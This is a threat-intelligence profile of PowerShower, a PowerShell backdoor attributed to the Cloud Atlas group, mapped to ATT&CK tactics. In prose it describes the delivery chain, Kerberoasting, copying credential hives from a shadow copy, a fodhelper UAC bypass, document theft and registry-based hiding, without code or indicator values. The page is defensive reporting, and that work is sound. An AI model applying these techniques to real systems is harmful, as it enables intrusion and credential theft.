PowerShower
PowerShower is a PowerShell-based backdoor used by the Cloud Atlas APT group. It has been described as a second-stage backdoor and reconnaissance tool deployed alongside VBCloud in Cloud Atlas intrusion chains. Recent reporting ties it to phishing campaigns targeting primarily government agencies, diplomatic organizations, and other entities in Russia and Belarus, where ZIP archives containing malicious LNK files launched external PowerShell scripts that established persistence, opened decoy PDFs, removed infection traces, and deployed PowerShower and VBCloud. Earlier reporting also states Cloud Atlas previously dropped PowerShower directly after exploiting Microsoft Equation Editor vulnerabilities CVE-2017-11882 and CVE-2018-0802.
PowerShower is primarily used for network reconnaissance and further propagation within victim environments. Reported capabilities include collecting information about running processes, administrator groups, domain controllers, and the current user; downloading and executing additional PowerShell scripts from command-and-control infrastructure; saving and executing VBScript; and conducting Kerberoasting attacks. It can encode C2 communications with Base64. It has also been associated with a PowerShell document-stealer module that uses 7Zip to compress and exfiltrate .txt, .pdf, .xls, and .doc files smaller than 5 MB that were modified within the previous two days, sending the data over its C2 channel.
For stealth and cleanup, PowerShower has been reported to add a registry key so future powershell.exe instances spawn off-screen by default, remove registry entries left by the dropper process, and delete files created during the dropper process. In Cloud Atlas operations, PowerShower has been observed persisted as C:\Users[username]\Pictures\googleearth.ps1. Associated infrastructure and activity in the same campaigns included attacker-controlled domains hosting PowerShell payloads and broader Cloud Atlas use of reverse SSH tunnels, RevSocks, and Tor-backed access, though those mechanisms are part of the surrounding intrusion set rather than confirmed intrinsic PowerShower functionality.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Previously, Cloud Atlas dropped its “validator” implant named “PowerShower” directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802.
Previously, Cloud Atlas dropped its “validator” implant named “PowerShower” directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
When a victim opens the shortcut, it quietly runs a PowerShell script pulled from an external server. That script sets up persistence, downloads a decoy PDF to distract the user, removes infection traces, and deploys payloads including a backdoor called VBCloud and a reconnaissance tool called PowerShower.
Techniques & procedures
23 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution
1 techniqueThe content repeatedly describes threat actors and malware using PowerShell scripts/commands for execution, download, staging, reconnaissance, persistence, credential access, lateral movement, and defense evasion; e.g., "Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses."
Persistence
2 techniquesThe content repeatedly describes threat actors and malware modifying, creating, deleting, or storing data in Windows Registry keys and values for persistence, configuration storage, defense evasion, credential access, privilege escalation, and execution.
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder.
Privilege Escalation
2 techniquesThe content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder.
Для получения повышенных привилегий скрипт использует технику обхода UAC через fodhelper.exe ... позволяет запустить PowerShell с правами администратора без прямого запроса пользователю.
Stealth
3 techniquesCopies the SAM ... and SECURITY system files from this shadow copy to C:\Users\Public\Documents\, disguising them as PDF files.
Examples throughout the content include deleting tools, logs, malware-related files, staged archives, screenshots, temporary files, and exfiltrated data 'to cover their tracks,' 'reduce their footprint,' 'remove traces of activity,' or as part of 'post-intrusion cleanup.'
The content repeatedly describes threat actors and malware deleting files, tools, scripts, logs, droppers, staged data, and artifacts from compromised systems to cover tracks, remove evidence, or self-delete.
Defense Impairment
1 techniqueCredential Access
3 techniquesPowerShower загружает дополнительный скрипт для кражи учетных данных ... копирует системные файлы SAM ... и SECURITY из теневой копии
Creates a Volume Shadow Copy of the C:\ drive. Copies the SAM ... and SECURITY system files from this shadow copy
PowerShower может выполнять следующие задачи ... проведение атак типа Kerberoasting (кража хэшей паролей учетных записей Active Directory).
Discovery
7 techniquesThe content repeatedly describes actors and malware using commands and APIs such as ipconfig /all, ifconfig, arp -a, route print, netsh interface show, GetAdaptersInfo, and GetIpNetTable to gather IP addresses, MAC addresses, DNS, DHCP, gateways, routing tables, ARP cache, proxy settings, and network adapter/interface details.
That script sets up persistence, downloads a decoy PDF to distract the user, removes infection traces, and deploys payloads including a backdoor called VBCloud and a reconnaissance tool called PowerShower.
The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking admin status, and enumerating user sessions.
The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
PowerShower can perform the following tasks: Collect information about running processes, administrator groups, and domain controllers.
The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."
PowerShower может выполнять следующие задачи: сбор информации о ... контроллерах домена.
Collection
1 techniqueWinter Vivern delivered a PowerShell script capable of recursively scanning victim machines looking for various file types before exfiltrating identified files via HTTP... Tomiris can upload files matching a hardcoded set of extensions... PowerShower packed and exfiltrated .txt, .pdf, .xls or .doc files smaller than 5MB modified during the past two days.
Command and Control
4 techniquesThis is the main module that connects to a C2 server to receive additional scripts or execute built-in commands.
The content repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including examples such as BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.
When a victim opens the shortcut, it quietly runs a PowerShell script pulled from an external server.
C2 traffic from ADVSTORESHELL is encrypted, then encoded with Base64 encoding... APT19 HTTP malware variant used Base64 to encode communications to the C2 server... APT33 has used base64 to encode command and control traffic.
Exfiltration
1 techniqueADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.
IOCs tracked for this family
24 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
30 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A reconnaissance tool used by Cloud Atlas during post-compromise activity, delivered alongside VBCloud.
Backdoor focused on network reconnaissance and lateral movement. It can collect information on running processes, administrator groups, and domain controllers, download and execute PowerShell scripts from C2, perform Kerberoasting, and load an additional credential-theft script that copies SAM and SECURITY hives using a shadow copy and uses fodhelper.exe for UAC bypass.
PowerShower is a backdoor used as a secondary payload by Cloud Atlas, capable of retrieving and executing additional payloads from a remote server.
PowerShower is a PowerShell-based backdoor that executes additional payloads retrieved from its C2 server, exfiltrates data, and can grab files from network shares. It is installed and launched by VBShower.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.